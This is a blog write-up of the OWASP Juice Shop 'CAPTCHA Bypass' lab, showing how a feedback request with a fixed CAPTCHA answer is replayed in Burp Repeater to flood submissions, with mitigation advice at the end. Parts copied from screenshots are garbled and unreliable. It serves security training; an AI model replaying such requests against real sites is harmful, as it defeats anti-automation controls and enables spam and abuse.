Pwning OWASP’s Juice Shop Pt. 20: CAPTCHA Bypass

Challenge: 

Name:  CAPTCHA Bypass

Description: Submit 10 or more customer feedbacks within 10 seconds.

Difficulty: 3 star

Category: Broken Anti-Automation

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-anti-automation.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

As usual, I started with the expanded description, which provided three possible methods for completing this challenge. Only one looked appealing, however.

Submit 10 or more customer feedbacks within 10 seconds 
The Contact Us form for customer feedback contains a CAPTCHA to protect it from being abused through 
scripting. This challenge is about beating this automation protection. 
A completely automated public Turing test to tell computers and humans apart, or CAPTCHA, is a 
program that allows you to distinguish between humans and computers. First widely used by Alta 
Vista to prevent automated search submissions, CAPTCHAs are particularly effective in stopping any 
kind of automated abuse, including brute-force attacks. They work by presenting some test that is 
easy for humans to pass but difficult for computers to pass; therefore, they can conclude with some 
certainty whether there is a human on the other end 
For a CAPTCHA to be effective, humans must be able to answer the test correctly as close to 100 
2 
percent of the time as possible. Computers must fail as close to 100 percent of the time as possible. 
• You could prepare 10 browser tabs, solving every CAP TCHA and filling out the each feedback form. 
Then you'd need to very quickly switch through the tabs and submit the forms in under 10 seconds 
total. 
• Should the Juice Shop ever decide to change the challenge into "Submit 100 or more customer 
feedbacks w,'thin 60 seconds" or worse, you'd probably have a hard time keeping up with any tab- 
switching approach. 
• 'Investigate closélVhoWtheCAPTCHAnechamsmyorksanfftrytOfindéitheV4 
automatedwayofsolvingutdynamcally 
Wrap this into a script (in whatever programming language you prefer) that repeats this 10 times.

First let’s figure out how the CAPTCHA mechanism works. I set up Burp and FoxyProxy, then made my way to the Customer Feedback form.

Customer Feedback 
Author - 
anonymous 
Comment 
burpsuite go brrrr 
O Max. 160 characters 
18/160 
Rating 
CAPTCHA: 
Result 
14 
What is 
7+6+1 ? 
Submit

Nothing on the screen jumped out at me, so after filling in the form, I sent it off to Burp for analysis.

Burp Project 
Dashboard 
Send 
Request 
Intruder Repeater Window 
Help Logger++ HIT P Request Smuggler 
Target 
Intruder 
Repeater 
Sequencer Decoder 
Comparer 
Extender 
proje 
Params 
Headers 
Pretty 
Raw Actions V 
1 POST /api/Feedbacks/ HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Content -Type: application/ j son 
Content -Length: 84 
Origin: http 
// I Ocal host 3000 
10 Connection: close 
Referer: http://localhost : 3000/ 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
12 Cookie: language=en; welcomebanner status=dismiss; 
cookieconsent 
status=dismiss, 
con 
14 { 
'captchald' 
'captcha 
comment 
rating" : I 
'burpsuite go brrrr 
Search 
(anonymous) 
O matches
If you change the rating to “0”, you can also solve the “Zero Stars” challenge.

If “captchaId” is always 0, and the answer to “captchaId” 0 is always 14, then all that really needs to be done to bypass the CAPTCHA and complete the challenge is to send the packet to Burp’s Repeater tab and spam the “Send” button until you see…

You successfully solved a challenge: CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.) 
x

Prevention and Mitigation Strategies:

Use actual CAPTCHA, only allow registered users to submit feedback, and limit the number of feedback comments each registered user is allowed to submit in a given time span.

Lessons Learned and Things Worth Mentioning: 

  1. CAPTCHA is successful for a variety of reasons. Home-brewed CAPTCHA copies are never going to be as sophisticated as the real thing.
  2. While the other two methods suggested in the expanded description would all work, I chose this method because every bit of practice I can get with Burp Suite helps me get more comfortable with it.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s